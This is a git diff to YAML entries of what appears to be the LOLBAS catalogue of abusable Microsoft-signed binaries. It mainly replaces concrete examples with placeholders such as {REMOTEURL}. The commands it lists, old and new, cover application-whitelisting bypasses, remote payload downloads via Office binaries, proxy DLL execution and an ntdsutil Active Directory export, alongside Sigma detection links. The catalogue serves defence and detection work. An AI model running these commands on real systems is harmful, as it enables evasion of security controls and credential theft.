diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index 6058ea5..73161ba 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml @@ -4,7 +4,7 @@ Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotN Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: fsi.exe c:\path\to\test.fsscript + - Command: fsi.exe {PATH:.fsscript} Description: Execute F# code via script file Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml index 4241cbe..e3efbed 100644 --- a/yml/OtherMSBinaries/FsiAnyCpu.yml +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml @@ -4,7 +4,7 @@ Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - - Command: fsianycpu.exe c:\path\to\test.fsscript + - Command: fsianycpu.exe {PATH:.fsscript} Description: Execute F# code via script file Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass diff --git a/yml/OtherMSBinaries/Mftrace.yml b/yml/OtherMSBinaries/Mftrace.yml index c564efa..8839826 100644 --- a/yml/OtherMSBinaries/Mftrace.yml +++ b/yml/OtherMSBinaries/Mftrace.yml @@ -1,11 +1,11 @@ --- Name: Mftrace.exe Description: Trace log generation tool for Media Foundation Tools. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Mftrace.exe cmd.exe - Description: Launch cmd.exe as a subprocess of Mftrace.exe. + - Command: Mftrace.exe {PATH:.exe} + Description: Launch specified executable as a subprocess of Mftrace.exe. Usecase: Local execution of cmd.exe as a subprocess of Mftrace.exe. Category: Execute Privileges: User 
@@ -13,22 +13,11 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: Mftrace.exe powershell.exe - Description: Launch cmd.exe as a subprocess of Mftrace.exe. - Usecase: Local execution of powershell.exe as a subprocess of Mftrace.exe. - Category: Execute - Privileges: User - MitreID: T1127 - OperatingSystem: Windows - Tags: - - Execute: EXE Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\x86\mftrace.exe - Path: C:\Program Files (x86)\Windows Kits\10\bin\x64\mftrace.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml Resources: diff --git a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml index 7ca4f43..3afd6cd 100644 --- a/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml +++ b/yml/OtherMSBinaries/Microsoft.NodejsTools.PressAnyKey.yml @@ -4,8 +4,8 @@ Description: Part of the NodeJS Visual Studio tools. Author: mr.d0x Created: 2022-01-20 Commands: - - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 cmd.exe - Description: Launch cmd.exe as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe. + - Command: Microsoft.NodejsTools.PressAnyKey.exe normal 1 {PATH:.exe} + Description: Launch specified executable as a subprocess of Microsoft.NodejsTools.PressAnyKey.exe. Usecase: Spawn a new process via Microsoft.NodejsTools.PressAnyKey.exe. Category: Execute Privileges: User diff --git a/yml/OtherMSBinaries/Msaccess.yml b/yml/OtherMSBinaries/Msaccess.yml index 618cbdb..7c5b17a 100644 --- a/yml/OtherMSBinaries/Msaccess.yml +++ b/yml/OtherMSBinaries/Msaccess.yml 
@@ -4,7 +4,7 @@ Description: Microsoft Office component Author: Nir Chako Created: 2023-04-30 Commands: - - Command: MSAccess.exe https://example.com/payload.exe.mdb + - Command: MSAccess.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload (if it has the filename extension .mdb) and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Msdeploy.yml b/yml/OtherMSBinaries/Msdeploy.yml index 7cc0921..edafbf4 100644 --- a/yml/OtherMSBinaries/Msdeploy.yml +++ b/yml/OtherMSBinaries/Msdeploy.yml @@ -1,11 +1,11 @@ --- Name: Msdeploy.exe Description: Microsoft tool used to deploy Web Applications. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" - Description: Launch calc.bat via msdeploy.exe. + - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}" + Description: Launch .bat file via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. Category: Execute Privileges: User @@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server Tags: - Execute: CMD - - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat" - Description: Launch calc.bat via msdeploy.exe. + - Command: msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="{PATH_ABSOLUTE:.bat}" + Description: Launch .bat file via msdeploy.exe. Usecase: Local execution of batch file using msdeploy.exe. Category: AWL Bypass Privileges: User 
@@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11, Windows Server Tags: - Execute: CMD - - Command: msdeploy.exe -verb:sync -source:filePath=C:\windows\system32\calc.exe -dest:filePath=C:\Users\Public\calc.exe + - Command: msdeploy.exe -verb:sync -source:filePath={PATH_ABSOLUTE:.source.ext} -dest:filePath={PATH_ABSOLUTE:.dest.ext} Description: Copy file from source to destination. Usecase: Copy file. Category: Copy @@ -38,8 +38,6 @@ Full_Path: - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V4\msdeploy.exe - Path: C:\Program Files\IIS\Microsoft Web Deploy V5\msdeploy.exe - Path: C:\Program Files (x86)\IIS\Microsoft Web Deploy V5\msdeploy.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_msdeploy.yml Resources: diff --git a/yml/OtherMSBinaries/MsoHtmEd.yml b/yml/OtherMSBinaries/MsoHtmEd.yml index a1af94e..faafee4 100644 --- a/yml/OtherMSBinaries/MsoHtmEd.yml +++ b/yml/OtherMSBinaries/MsoHtmEd.yml @@ -4,7 +4,7 @@ Description: Microsoft Office component Author: Nir Chako Created: 2022-07-24 Commands: - - Command: MsoHtmEd.exe https://example.com/payload + - Command: MsoHtmEd.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Mspub.yml b/yml/OtherMSBinaries/Mspub.yml index e325d90..dd1c59d 100644 --- a/yml/OtherMSBinaries/Mspub.yml +++ b/yml/OtherMSBinaries/Mspub.yml @@ -4,7 +4,7 @@ Description: Microsoft Publisher Author: Nir Chako Created: 2022-08-02 Commands: - - Command: mspub.exe https://example.com/payload + - Command: mspub.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download 
diff --git a/yml/OtherMSBinaries/Msxsl.yml b/yml/OtherMSBinaries/Msxsl.yml index d87746e..4b9372c 100644 --- a/yml/OtherMSBinaries/Msxsl.yml +++ b/yml/OtherMSBinaries/Msxsl.yml @@ -1,10 +1,10 @@ --- Name: msxsl.exe Description: Command line utility used to perform XSL transformations. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: msxsl.exe customers.xml script.xsl + - Command: msxsl.exe {PATH:.xml} {PATH:.xsl} Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: XSL - - Command: msxsl.exe customers.xml script.xsl + - Command: msxsl.exe {PATH:.xml} {PATH:.xsl} Description: Run COM Scriptlet code within the script.xsl file (local). Usecase: Local execution of script stored in XSL file. Category: AWL Bypass @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: XSL - - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml + - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. Category: Execute @@ -32,7 +32,7 @@ Commands: Tags: - Execute: XSL - Execute: Remote - - Command: msxsl.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml + - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xml} Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote). Usecase: Local execution of remote script stored in XSL script stored as an XML file. Category: AWL Bypass 
@@ -42,14 +42,14 @@ Commands: Tags: - Execute: XSL - Execute: Remote - - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o + - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH} Description: Using remote XML and XSL files, save the transformed XML file to disk. Usecase: Download a file from the internet and save it to disk. Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows - - Command: msxsl.exe https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/calc.xml https://raw.githubusercontent.com/RonnieSalomonsen/Use-msxsl-to-download-file/main/transform.xsl -o :ads-name + - Command: msxsl.exe {REMOTEURL:.xml} {REMOTEURL:.xsl} -o {PATH}:ads-name Description: Using remote XML and XSL files, save the transformed XML file to an Alternate Data Stream (ADS). Usecase: Download a file from the internet and save it to an NTFS Alternate Data Stream. Category: ADS diff --git a/yml/OtherMSBinaries/Ntdsutil.yml b/yml/OtherMSBinaries/Ntdsutil.yml index f95f045..e8b78c0 100644 --- a/yml/OtherMSBinaries/Ntdsutil.yml +++ b/yml/OtherMSBinaries/Ntdsutil.yml @@ -1,7 +1,7 @@ --- Name: ntdsutil.exe Description: Command line utility used to export Active Directory. -Author: 'Tony Lambert' +Author: Tony Lambert Created: 2020-01-10 Commands: - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q @@ -13,8 +13,6 @@ Commands: OperatingSystem: Windows Full_Path: - Path: C:\Windows\System32\ntdsutil.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml 
diff --git a/yml/OtherMSBinaries/OpenConsole.yml b/yml/OtherMSBinaries/OpenConsole.yml index a6ddcb7..56c6579 100644 --- a/yml/OtherMSBinaries/OpenConsole.yml +++ b/yml/OtherMSBinaries/OpenConsole.yml @@ -4,8 +4,8 @@ Description: Console Window host for Windows Terminal Author: Nasreddine Bencherchali Created: 2022-06-17 Commands: - - Command: "OpenConsole.exe calc" - Description: Execute calc with OpenConsole.exe as parent process + - Command: OpenConsole.exe {PATH:.exe} + Description: Execute specified process with OpenConsole.exe as parent process Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures Category: Execute Privileges: User diff --git a/yml/OtherMSBinaries/Powerpnt.yml b/yml/OtherMSBinaries/Powerpnt.yml index b72699d..c535c42 100644 --- a/yml/OtherMSBinaries/Powerpnt.yml +++ b/yml/OtherMSBinaries/Powerpnt.yml @@ -4,7 +4,7 @@ Description: Microsoft Office binary. Author: 'Reegun J (OCBC Bank)' Created: 2019-07-19 Commands: - - Command: Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll" + - Command: Powerpnt.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: It will download a remote payload and place it in INetCache. Category: Download diff --git a/yml/OtherMSBinaries/Procdump.yml b/yml/OtherMSBinaries/Procdump.yml index 0b05151..1238c06 100644 --- a/yml/OtherMSBinaries/Procdump.yml +++ b/yml/OtherMSBinaries/Procdump.yml 
@@ -6,8 +6,8 @@ Aliases: Author: 'Alfie Champion (@ajpc500)' Created: 2020-10-14 Commands: - - Command: procdump.exe -md calc.dll explorer.exe - Description: Loads calc.dll where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. + - Command: procdump.exe -md {PATH:.dll} explorer.exe + Description: Loads the specified DLL where DLL is configured with a 'MiniDumpCallbackRoutine' exported function. Valid process must be provided as dump still created. Usecase: Performs execution of unsigned DLL. Category: Execute Privileges: User @@ -15,8 +15,8 @@ Commands: OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher Tags: - Execute: DLL - - Command: procdump.exe -md calc.dll foobar - Description: Loads calc.dll where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. + - Command: procdump.exe -md {PATH:.dll} foobar + Description: Loads the specified DLL where configured with DLL_PROCESS_ATTACH execution, process argument can be arbitrary. Usecase: Performs execution of unsigned DLL. Category: Execute Privileges: User diff --git a/yml/OtherMSBinaries/ProtocolHandler.yml b/yml/OtherMSBinaries/ProtocolHandler.yml index 250fbf8..b3c81c2 100644 --- a/yml/OtherMSBinaries/ProtocolHandler.yml +++ b/yml/OtherMSBinaries/ProtocolHandler.yml @@ -4,7 +4,7 @@ Description: Microsoft Office binary Author: Nir Chako Created: 2022-07-24 Commands: - - Command: ProtocolHandler.exe https://example.com/payload + - Command: ProtocolHandler.exe {REMOTEURL} Description: Downloads payload from remote server Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)" Category: Download diff --git a/yml/OtherMSBinaries/Rcsi.yml b/yml/OtherMSBinaries/Rcsi.yml index 7090e1e..cfb8fbb 100644 --- a/yml/OtherMSBinaries/Rcsi.yml 
+++ b/yml/OtherMSBinaries/Rcsi.yml @@ -1,10 +1,10 @@ --- Name: rcsi.exe Description: Non-Interactive command line inerface included with Visual Studio. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: rcsi.exe bypass.csx + - Command: rcsi.exe {PATH:.csx} Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: CSharp - - Command: rcsi.exe bypass.csx + - Command: rcsi.exe {PATH:.csx} Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: AWL Bypass @@ -24,8 +24,6 @@ Commands: - Execute: CSharp Full_Path: - Path: no default -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml diff --git a/yml/OtherMSBinaries/Remote.yml b/yml/OtherMSBinaries/Remote.yml index cb63fb6..3380ce3 100644 --- a/yml/OtherMSBinaries/Remote.yml +++ b/yml/OtherMSBinaries/Remote.yml @@ -4,8 +4,8 @@ Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 2021-06-01 Commands: - - Command: Remote.exe /s "powershell.exe" anythinghere - Description: Spawns powershell as a child process of remote.exe + - Command: Remote.exe /s {PATH:.exe} anythinghere + Description: Spawns specified executable as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: AWL Bypass Privileges: User 
@@ -13,8 +13,8 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: Remote.exe /s "powershell.exe" anythinghere - Description: Spawns powershell as a child process of remote.exe + - Command: Remote.exe /s {PATH:.exe} anythinghere + Description: Spawns specified executable as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: EXE - - Command: Remote.exe /s "\\10.10.10.30\binaries\file.exe" anythinghere + - Command: Remote.exe /s {PATH_SMB:.exe} anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute @@ -35,8 +35,6 @@ Commands: Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe -Code_Sample: - - Code: Detection: - IOC: remote.exe process spawns - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml diff --git a/yml/OtherMSBinaries/Sqldumper.yml b/yml/OtherMSBinaries/Sqldumper.yml index 2417441..935bcba 100644 --- a/yml/OtherMSBinaries/Sqldumper.yml +++ b/yml/OtherMSBinaries/Sqldumper.yml @@ -1,7 +1,7 @@ --- Name: Sqldumper.exe Description: Debugging utility included with Microsoft SQL. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: sqldumper.exe 464 0 0x0110 
@@ -21,8 +21,6 @@ Commands: Full_Path: - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml diff --git a/yml/OtherMSBinaries/Sqlps.yml b/yml/OtherMSBinaries/Sqlps.yml index e495ef0..fb8477b 100644 --- a/yml/OtherMSBinaries/Sqlps.yml +++ b/yml/OtherMSBinaries/Sqlps.yml @@ -1,7 +1,7 @@ --- Name: Sqlps.exe Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Sqlps.exe -noprofile @@ -19,8 +19,6 @@ Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml diff --git a/yml/OtherMSBinaries/Sqltoolsps.yml b/yml/OtherMSBinaries/Sqltoolsps.yml index b7c66aa..b4ca186 100644 
--- a/yml/OtherMSBinaries/Sqltoolsps.yml +++ b/yml/OtherMSBinaries/Sqltoolsps.yml @@ -1,10 +1,10 @@ --- Name: SQLToolsPS.exe Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: SQLToolsPS.exe -noprofile -command Start-Process calc.exe + - Command: SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe} Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. Usecase: Execute PowerShell command. Category: Execute @@ -15,8 +15,6 @@ Commands: - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml - Splunk: https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md diff --git a/yml/OtherMSBinaries/Squirrel.yml b/yml/OtherMSBinaries/Squirrel.yml index a8207ad..6ff1b20 100644 --- a/yml/OtherMSBinaries/Squirrel.yml +++ b/yml/OtherMSBinaries/Squirrel.yml 
@@ -4,14 +4,14 @@ Description: Binary to update the existing installed Nuget/squirrel package. Par Author: 'Reegun J (OCBC Bank) - @reegun21' Created: 2019-06-26 Commands: - - Command: squirrel.exe --download [url to package] + - Command: squirrel.exe --download {REMOTEURL} Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: squirrel.exe --update [url to package] + - Command: squirrel.exe --update {REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -21,7 +21,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: squirrel.exe --update [url to package] + - Command: squirrel.exe --update {REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute @@ -31,7 +31,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: squirrel.exe --updateRollback=[url to package] + - Command: squirrel.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -41,7 +41,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: squirrel.exe --updateRollback=[url to package] + - Command: squirrel.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute diff --git a/yml/OtherMSBinaries/Te.yml b/yml/OtherMSBinaries/Te.yml index d5d0580..e63c73b 100644 --- a/yml/OtherMSBinaries/Te.yml +++ b/yml/OtherMSBinaries/Te.yml 
@@ -4,7 +4,7 @@ Description: Testing tool included with Microsoft Test Authoring and Execution F Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: te.exe bypass.wsc + - Command: te.exe {PATH:.wsc} Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. Usecase: Execute Visual Basic script stored in local Windows Script Component file. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: WSH - - Command: te.exe test.dll + - Command: te.exe {PATH:.dll} Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures. Usecase: Execute DLL file. Category: Execute diff --git a/yml/OtherMSBinaries/Teams.yml b/yml/OtherMSBinaries/Teams.yml index 622843c..1511e29 100644 --- a/yml/OtherMSBinaries/Teams.yml +++ b/yml/OtherMSBinaries/Teams.yml @@ -22,7 +22,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: Node.JS - - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&" + - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute diff --git a/yml/OtherMSBinaries/Tracker.yml b/yml/OtherMSBinaries/Tracker.yml index abaddfd..c94a43e 100644 --- a/yml/OtherMSBinaries/Tracker.yml +++ b/yml/OtherMSBinaries/Tracker.yml 
@@ -1,10 +1,10 @@ --- Name: Tracker.exe Description: Tool included with Microsoft .Net Framework. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2018-05-25 Commands: - - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe + - Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: Execute @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows Tags: - Execute: DLL - - Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe + - Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: AWL Bypass @@ -24,8 +24,6 @@ Commands: - Execute: DLL Full_Path: - Path: no default -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml Resources: diff --git a/yml/OtherMSBinaries/Update.yml b/yml/OtherMSBinaries/Update.yml index 1dde3d0..81b704e 100644 --- a/yml/OtherMSBinaries/Update.yml +++ b/yml/OtherMSBinaries/Update.yml 
@@ -1,17 +1,17 @@ --- Name: Update.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. -Author: 'Oddvar Moe' +Author: Oddvar Moe Created: 2019-06-26 Commands: - - Command: Update.exe --download [url to package] + - Command: Update.exe --download {REMOTEURL} Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed - - Command: Update.exe --update=[url to package] + - Command: Update.exe --update={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -21,7 +21,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --update=[url to package] + - Command: Update.exe --update={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute @@ -31,7 +31,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --update=\\remoteserver\payloadFolder + - Command: Update.exe --update={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: AWL Bypass @@ -41,7 +41,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --update=\\remoteserver\payloadFolder + - Command: Update.exe --update={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: Execute 
@@ -51,7 +51,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --updateRollback=[url to package] + - Command: Update.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass @@ -61,7 +61,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --updateRollback=[url to package] + - Command: Update.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute @@ -71,7 +71,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --processStart payload.exe --process-start-args "whatever args" + - Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass Category: AWL Bypass @@ -81,7 +81,7 @@ Commands: Tags: - Execute: CMD - Execute: Remote - - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder + - Command: Update.exe --updateRollback={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: AWL Bypass @@ -91,7 +91,7 @@ Commands: Tags: - Execute: Nuget - Execute: Remote - - Command: Update.exe --updateRollback=\\remoteserver\payloadFolder + - Command: Update.exe --updateRollback={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: Execute 
